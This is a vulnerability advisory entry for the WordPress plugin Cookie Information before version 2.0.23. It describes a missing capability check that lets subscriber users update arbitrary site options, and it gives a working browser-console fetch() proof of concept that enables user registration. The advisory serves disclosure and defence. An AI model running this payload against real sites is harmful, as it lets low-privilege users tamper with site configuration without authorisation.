WpvulndbWPVDB-ID:0C207E0A-F52D-4A59-A7B1-94E4A19B45F6Cookie Information < 2.0.23 - Subscriber+ Arbitrary Options Update
Description The plugin is vulnerable to arbitrary option updates due to a missing capability check on its AJAX request handler, allowing any authenticated users, such as subscriber to update arbitrary site options
PoC
Run the below command in the developer console of the web browser while being on the blog as subscriber user to set the users_can_register option to true. fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=wpgdprc_update_integration&data;={“name”:“users_can_register”,“value”:true,“type”:“yolo”}&security;=’ + wpgdprcAdmin[‘ajaxNonce’], “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 2.0.23 |
Related
8.7 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
19.5%